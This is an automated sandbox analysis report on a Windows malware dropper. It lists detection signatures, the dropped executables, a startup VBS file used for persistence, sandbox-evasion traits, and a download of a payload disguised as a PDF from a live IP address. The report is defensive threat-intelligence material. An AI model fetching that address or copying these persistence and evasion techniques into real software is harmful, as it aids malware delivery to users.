Windows Analysis Report
SecuriteInfo.com.FileRepMalware.3248.17662.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.3248.17662.exe
Analysis ID:1545677
MD5:485927fe0c19012f31f1ef565254b374
SHA1:af67270688bdaca5c92425ce644f248703f80e41
SHA256:11d025152433189799f82de6b428f5ceb8ddb47573a38d51c267d48b891d498e
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Downloads files with wrong headers with respect to MIME Content-Type
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.3248.17662.exe (PID: 4136 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe" MD5: 485927FE0C19012F31F1EF565254B374)
    • seniorcommunicate.exe (PID: 6752 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe MD5: D9021E407CD5133BA842A9F6F21B606B)
      • InstallUtil.exe (PID: 3796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • WerFault.exe (PID: 4620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1172 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 5388 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.2539050952.0000000006FB0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
Process Memory Space: seniorcommunicate.exe PID: 6752 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
Process Memory Space: seniorcommunicate.exe PID: 6752 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
Source | Rule | Description | Author | Strings
1.2.seniorcommunicate.exe.6fb0000.13.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
1.2.seniorcommunicate.exe.4a9df48.5.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
1.2.seniorcommunicate.exe.48105e8.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
                  Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe, ProcessId: 4136, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

                  Data Obfuscation

                  Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbs
                  No Suricata rule has matched

                  AV Detection

                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, Avira: detected
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe, Avira: detection malicious, Label: HEUR/AGEN.1323683
                  Source: C:\Users\user\AppData\Local\cvchost.exe, Avira: detection malicious, Label: HEUR/AGEN.1323683
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe, ReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\cvchost.exe, ReversingLabs: Detection: 28%
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, ReversingLabs: Detection: 47%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.5% probability
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe, Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\cvchost.exe, Joe Sandbox ML: detected
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, Joe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe, Code function: 0_2_00007FF71D1D30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF71D1D30EC
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb0#x source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbZ source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: eulUtil.pdbl source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: wextract.pdb source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: ((.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbpv source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdbc source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3360530165.00000000052F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000C37000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdb} source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb' source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBp& source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbps source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe, Code function: 0_2_00007FF71D1D204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF71D1D204C

                  Networking

                  Source: http, Bad PDF prefix: HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 19:19:01 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 25 Oct 2024 15:28:31 GMT ETag: "14dc08-6254ec57945c0" Accept-Ranges: bytes Content-Length: 1367048 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf
                  Source: global traffic, HTTP traffic detected: GET /spool01/Rhxkjsv.pdf HTTP/1.1 Host: 46.8.237.66 Connection: Keep-Alive
                  Source: unknown, TCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.8.237.66
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.8.237.66/spool01/Rhxkjsv.pdf
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000000.2106899462.0000000000FB2000.00000002.00000001.01000000.00000004.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://46.8.237.66/spool01/Rhxkjsv.pdfV
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ocsp.thawte.com0
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe, Code function: 0_2_00007FF71D1D2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF71D1D2C54
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe, Code function: 0_2_00007FF71D1D1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF71D1D1C0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1172
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 36778 bytes, 1 file, at 0x2c +A "seniorcommunicate.exe", ID 2197, number 1, 2 datablocks, 0x1503 compression
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameseniorcommunicate.exe" vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000000.2106170825.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameseniorcommunicate.exe" vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: seniorcommunicate.exe.0.dr, OrderComposerExporter.csCryptographic APIs: 'CreateDecryptor'
                  Source: cvchost.exe.1.dr, OrderComposerExporter.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, rjm77BLgSlS4gfsq4b.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, lVPThIaqfiNX7UqKFF.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, eEMbGORUaTTyJOqnkhL.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: classification engineClassification label: mal100.expl.evad.winEXE@7/3@0/1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D473C CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF71D1D473C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D66C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF71D1D66C4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D5D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF71D1D5D90
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbs
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:64:WilError_03
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeReversingLabs: Detection: 47%
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe"
